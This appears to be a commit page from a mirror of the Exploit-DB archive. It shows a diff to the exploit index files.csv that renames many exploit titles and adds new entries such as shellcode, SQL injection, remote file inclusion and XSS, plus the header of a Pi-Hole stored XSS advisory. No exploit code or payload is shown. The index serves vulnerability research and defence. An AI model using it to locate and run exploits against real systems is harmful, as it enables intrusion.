bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-08-17

Browse source 
10 new exploits

Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit
Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service

LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit
LifeType 1.0.4 - Multiple Vulnerabilities

Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit
Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service
cms-bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote Include
CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion
Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit
empris r20020923 - (phormationdir) Remote Include
aePartner 0.8.3 - (dir[data]) Remote Include
0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC
empris r20020923 - (phormationdir) Remote File Inclusion
aePartner 0.8.3 - (dir[data]) Remote File Inclusion
SmartSiteCMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service Exploit
SmartSite CMS 1.0 - (root) Remote File Inclusion
Opera 9 - (long href) Remote Denial of Service

w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit
w-Agora 4.2.0 - (inc_dir) Remote File Inclusion

BitchX 1.1-final do_hook() Remote Denial of Service Exploit
BitchX 1.1-final - do_hook() Remote Denial of Service

BLOG:CMS 4.0.0k SQL Injection Exploit
BLOG:CMS 4.0.0k - SQL Injection

Sun Board 1.00.00 alpha Remote File Inclusion
Sun Board 1.00.00 alpha - Remote File Inclusion

Mailist 3.0 Insecure Backup/Local File Inclusion
Mailist 3.0 - Insecure Backup/Local File Inclusion

AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion
AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion
VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion

VoteBox 2.0 Votebox.php Remote File Inclusion
VoteBox 2.0 - Votebox.php Remote File Inclusion

TRG News 3.0 Script Remote File Inclusion
TRG News 3.0 Script - Remote File Inclusion

Vortex Portal 2.0 content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion

Shoutbox 1.0 Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - Shoutbox.php Remote File Inclusion

Ajaxmint Gallery 1.0 Local File Inclusion
Ajaxmint Gallery 1.0 - Local File Inclusion
Zabbix 2.2.x_ 3.0.x - SQL Injection
Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)
Zabbix 2.2.x / 3.0.x - SQL Injection
Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal
Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection
Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist
Nagios Log Server 1.4.1 - Multiple Vulnerabilities
Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities
Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV
This commit is contained in:
Offensive Security 2016-08-17 05:02:47 +00:00
parent 24a0e1921a
commit 29076928d8
11 changed files with 1535 additions and 25 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
files.csv
View file

@ -1575,20 +1575,20 @@ id,file,description,date,author,platform,type,port
1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0
1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0
1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0
1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0
1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0
1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0
1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0
1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - Multiple Vulnerabilities",2006-06-03,rgod,php,webapps,0
1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0
1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0
1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0
1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0
1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0
1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0
@ -1598,13 +1598,13 @@ id,file,description,date,author,platform,type,port
1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0
1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0
1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0
1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0
1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0
1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0
1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
@ -1644,8 +1644,8 @@ id,file,description,date,author,platform,type,port
1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0
1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0
1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0
1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445
@ -1653,9 +1653,9 @@ id,file,description,date,author,platform,type,port
1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0
1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0
1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0
1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0
1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0
1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0
1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0
1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0
@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port
1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0
1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0
1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0
1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0
1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
@ -3739,7 +3739,7 @@ id,file,description,date,author,platform,type,port
4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0
4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0
4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0
4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0
4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80
4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0
@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port
7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0
8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0
8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0
@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port
14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI",2010-06-24,MISTERFRIBO,php,webapps,0
14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0
@ -20898,8 +20898,8 @@ id,file,description,date,author,platform,type,port
23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0
23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0
23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0
23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port
25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0
25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0
25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0
25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port
25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0
25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
@ -22401,7 +22401,7 @@ id,file,description,date,author,platform,type,port
25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0
25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0
25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 msg.php XSS",2005-03-23,"benji lemien",php,webapps,0
25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0
@ -27370,7 +27370,7 @@ id,file,description,date,author,platform,type,port
30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80
30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port
37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0
37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
@ -36386,9 +36386,19 @@ id,file,description,date,author,platform,type,port
40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80
40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x_ 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0
40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443
40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443
40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443
40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0
40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80
40248,platforms/php/webapps/40248.txt,"Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80
40249,platforms/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps,0
40250,platforms/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
40251,platforms/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
40253,platforms/windows/dos/40253.html,"Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0

Can't render this file because it is too large.

50
platforms/linux/webapps/40249.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Pi-Hole Web Interface Stored XSS in White/Black list file
# Author: loneferret from Kioptrix
# Product: Pi-Hole
# Version: Web Interface 1.3
# Web Interface software: https://github.com/pi-hole/AdminLTE
# Version: Pi-Hole v2.8.1
# Discovery date: July 20th 2016
# Vendor Site: https://pi-hole.net
# Software Download: https://github.com/pi-hole/pi-hole
# Tested on: Ubuntu 14.04
# Solution: Update to next version.
# Software description:
# The Pi-hole is an advertising-aware DNS/Web server. If an ad domain is queried,
# a small Web page or GIF is delivered in place of the advertisement.
# You can also replace ads with any image you want since it is just a simple
# Webpage taking place of the ads.
# Note: Not much of a vulnerability, implies you already have access
